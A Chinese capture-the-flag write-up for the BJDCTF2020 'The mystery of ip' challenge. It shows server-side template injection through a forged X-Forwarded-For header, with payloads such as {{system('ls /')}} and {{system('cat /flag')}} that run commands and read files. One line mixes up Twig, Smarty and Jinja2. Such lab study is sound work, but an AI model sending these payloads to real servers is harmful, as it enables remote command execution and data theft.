首页 > 其他分享 >[BJDCTF2020]The mystery of ip

[BJDCTF2020]The mystery of ip

时间:2024-02-01 17:58:11浏览次数:33  
标签:mystery ip system XFF flag BJDCTF2020

[BJDCTF2020]The mystery of ip

uVa8PP8t8pJ6LrbAZeflzIoe51k25wXxucIHnHPRl78

UkAqdmEt9p8T_hVZqpZypZ69AcftogQ__1J_tav_at8

1FMX7hRoZjVZlk5gkqhVyAXvYhnm8QkGAnpGO4qcmYY

pmLK2aimppXSBSC58TVrR2oOrp2rV3514-gRYtLZsjk

hint页面的源代码里发现提示

应该是和IP相关,有可能用到XFF请求头,遂用BP抓包

k5AfJtxfW87gACEoYe0uDlHGzmdq9Nr1W_Eso-TccU0

修改了XFF之后,被成功执行,XFF可控,代码是php代码,推测:

PHP可能存在Twig模版注入漏洞

Smarty模板的SSTI漏洞(主要为Flask存在Jinjia2模版注入漏洞)

添加模板算式,{{7*7}}成功执行

9-td0WGk2lwNaIlO0d27nsy71e7QwkjujmXPPqG89sA

尝试是否能执行命令:X-Forwarded-For:{{system('ls')}}

4UBiykiLMLwq9sEmwErwhe1z85FSucom71aEH2aKV74

随后改为{{system('ls /')}}发现flag文件

gXuKp1ofETKM66lPn4_qAdasWLy7l_u1m_CMmembHgA

接着改为{{system('cat /flag')}}得到flag

8BBEVDwUjIqumzYV5xZGXH_VZ8-rOnfE6BkAxkB_pGI

标签:mystery,ip,system,XFF,flag,BJDCTF2020
From: https://www.cnblogs.com/fishjumpriver/p/18001760

相关文章

  • Striped64源码阅读
    目录简介模型代码分析成员变量方法补充ThreadLocalRandomContended注解-解决伪共享问题参考链接本人的源码阅读主要聚焦于类的使用场景,一般只在java层面进行分析,没有深入到一些native方法的实现。并且由于知识储备不完整,很可能出现疏漏甚至是谬误,欢迎指出共同学习本文基于cor......
  • [Typescript 5] Intro to Variants (keyword in & out)
    Covariance-producer-out-functionreturnposition-samearrowdirectionContravariance-packager-in-functionparamposition-differentarrowdirectionInvariance-bothproducerandpackager-oneinfunctionreturnpositionandanotherinfun......
  • 从零搭建Vue3 + Typescript + Pinia + Vite + Tailwind CSS + Element Plus开发脚手架
    项目代码以上传至码云,项目地址:https://gitee.com/breezefaith/vue-ts-scaffold目录前言脚手架技术栈简介vue3TypeScriptPiniaTailwindCSSElementPlusvite详细步骤Node.js安装创建以typescript开发的vue3工程集成Pinia安装pinia修改main.ts创建一个store在组件中使用store集......
  • 网络流量分析 | AnaTraf 网络故障排除万用表教程更新: 如何抓取两个 MAC / IP 地址之
    AnaTraf致力于提供国产化网络流量分析、网络可视化、网络故障排除解决方案。AnaTraf网络万用表是一款实时的网络测量、流量分析工具,用于网络流量监控、识别网络性能瓶颈、快速排查网络问题。万用表的B站频道已经更新最新一期的教程。如何使用AnaTraf网络万用表抓取两个M......
  • Java和JavaScript区别与联系
    JavaScript和java属于两门语言。参考了java语言,“看上去与Java足够相似,但是比Java简单”,是简化版Java语言。特别是在定义对象变量的时候,省略的太极端了。java里有的很多常用类型的对象在js中是没有的。JavaScript由原网景(Netscape)公司的高级工程师布兰登·艾奇(BrendanEich)(曾经的M......
  • linux单网卡双IP配置
     [root@localhost~]#more/etc/sysconfig/network-scripts/ifcfg-ens224/etc/sysconfig/network-scripts/ifcfg-ens224:1::::::::::::::/etc/sysconfig/network-scripts/ifcfg-ens224::::::::::::::TYPE=EthernetPROXY_METHOD=noneBROWSER_ONLY=no#BOOTPROTO=dhcp......
  • 百度网盘(百度云)SVIP超级会员共享账号每日更新(2024.02.01)
    一、百度网盘SVIP超级会员共享账号可能很多人不懂这个共享账号是什么意思,小编在这里给大家做一下解答。我们多知道百度网盘很大的用处就是类似U盘,不同的人把文件上传到百度网盘,别人可以直接下载,避免了U盘的物理载体,直接在网上就实现文件传输。百度网盘SVIP会员可以让自己百度账......
  • calico网络 ipip改为BGP模式
    calico网络 包含 overlay 和underlay网络overlay  IPIP和VXLAN模式, IPIP可以使用BGP协议,VXLAN不能使用BGP协议, 可以跨网段,建立隧道underlay BGP模式, 必须同一个C网1、修改ippool,需要把ipipMode从Always修改成为Never(执行下面命令修改ipipMode)。[root@k8s-maste......
  • [转帖]Open JDK 8.0_152-b16 崩溃 : [libzip.so+0x12522] newEntry+0x62
    一.问题描述在执行spark任务的时候,JVM崩溃.崩溃dump日志:##AfatalerrorhasbeendetectedbytheJavaRuntimeEnvironment:##SIGBUS(0x7)atpc=0x00007f9adacb9522,pid=107874,tid=0x00007f9add417700##JREversion:Java(TM)SERuntimeEnvironme......
  • 探索五款全球知名的JavaScript混淆加密工具
    ​现在市场上有很多好用的JavaScript混淆加密工具,其中一些比较流行且受欢迎的工具包括:1、UglifyJS(罗马尼亚):UglifyJS是一个非常流行的JavaScript工具库,它可以压缩、混淆、美化和格式化JavaScript代码。使用UglifyJS时,您可以通过调整参数来控制压缩级别并设置混淆选项。网站......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99